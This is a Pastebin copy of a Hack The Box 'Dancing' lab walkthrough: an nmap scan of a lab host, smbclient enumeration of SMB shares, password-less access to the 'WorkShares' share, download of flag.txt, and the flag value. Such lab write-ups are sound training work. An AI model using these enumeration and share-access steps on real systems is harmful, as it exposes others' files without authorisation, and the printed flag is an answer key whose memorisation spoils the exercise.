Advertisement
MrA7

Hack The Box: Dancing

Apr 29th, 2023
64
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.86 KB | None | 0 0
  1.  
  2. **IP: 10.129.201.103**
  3.  
  4. ## Scanning / Enumeration
  5. #### nmap
  6. ```
  7. └──╼ [★]$ sudo nmap -A -sV -p- 10.129.201.103
  8. Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-14 21:08 GMT
  9. Nmap scan report for 10.129.201.103
  10. Host is up (0.023s latency).
  11. Not shown: 65524 closed tcp ports (reset)
  12. PORT STATE SERVICE VERSION
  13. 135/tcp open msrpc Microsoft Windows RPC
  14. 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
  15. 445/tcp open microsoft-ds?
  16. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  17. |_http-server-header: Microsoft-HTTPAPI/2.0
  18. |_http-title: Not Found
  19. 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  20. |_http-server-header: Microsoft-HTTPAPI/2.0
  21. |_http-title: Not Found
  22. 49664/tcp open msrpc Microsoft Windows RPC
  23. 49665/tcp open msrpc Microsoft Windows RPC
  24. 49666/tcp open msrpc Microsoft Windows RPC
  25. 49667/tcp open msrpc Microsoft Windows RPC
  26. 49668/tcp open msrpc Microsoft Windows RPC
  27. 49669/tcp open msrpc Microsoft Windows RPC
  28. ```
  29.  
  30. ### SMB - 445/TCP
  31. - Server Message Block protocol is open on default on port 445
  32. - The service that is running is `microsoft-ds`
  33. - We used `smbclient` and listed the shared files usin `-L`
  34. ```
  35. └──╼ [★]$ smbclient -L //10.129.201.103/
  36. Enter WORKGROUP\htb-mra7's password:
  37.  
  38. Sharename Type Comment
  39. --------- ---- -------
  40. ADMIN$ Disk Remote Admin
  41. C$ Disk Default share
  42. IPC$ IPC Remote IPC
  43. WorkShares Disk
  44. SMB1 disabled -- no workgroup available
  45. ```
  46. - We can access `WorkShares` without a password
  47. ```
  48. └──╼ [★]$ smbclient //10.129.201.103/WorkShares
  49. Enter WORKGROUP\htb-mra7's password:
  50. Try "help" to get a list of possible commands.
  51. smb: \> ls
  52. . D 0 Mon Mar 29 09:22:01 2021
  53. .. D 0 Mon Mar 29 09:22:01 2021
  54. Amy.J D 0 Mon Mar 29 10:08:24 2021
  55. James.P D 0 Thu Jun 3 09:38:03 2021
  56.  
  57. 5114111 blocks of size 4096. 1747778 blocks available
  58. smb: \> cd James.P\
  59. smb: \James.P\> ls
  60. . D 0 Thu Jun 3 09:38:03 2021
  61. .. D 0 Thu Jun 3 09:38:03 2021
  62. flag.txt A 32 Mon Mar 29 10:26:57 2021
  63.  
  64. 5114111 blocks of size 4096. 1747762 blocks available
  65. smb: \James.P\> get flag.txt
  66. getting file \James.P\flag.txt of size 32 as flag.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
  67. smb: \James.P\> exit
  68. ┌─[eu-starting-point-1-dhcp]─[10.10.14.29]─[htb-mra7@htb-chpbayfutd]─[~/my_data]
  69. └──╼ [★]$ cat flag.txt
  70. 5f61c10dffbc77a704d76016a22f1664
  71. ```
  72.  
  73. ## Flags
  74. - 5f61c10dffbc77a704d76016a22f1664
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement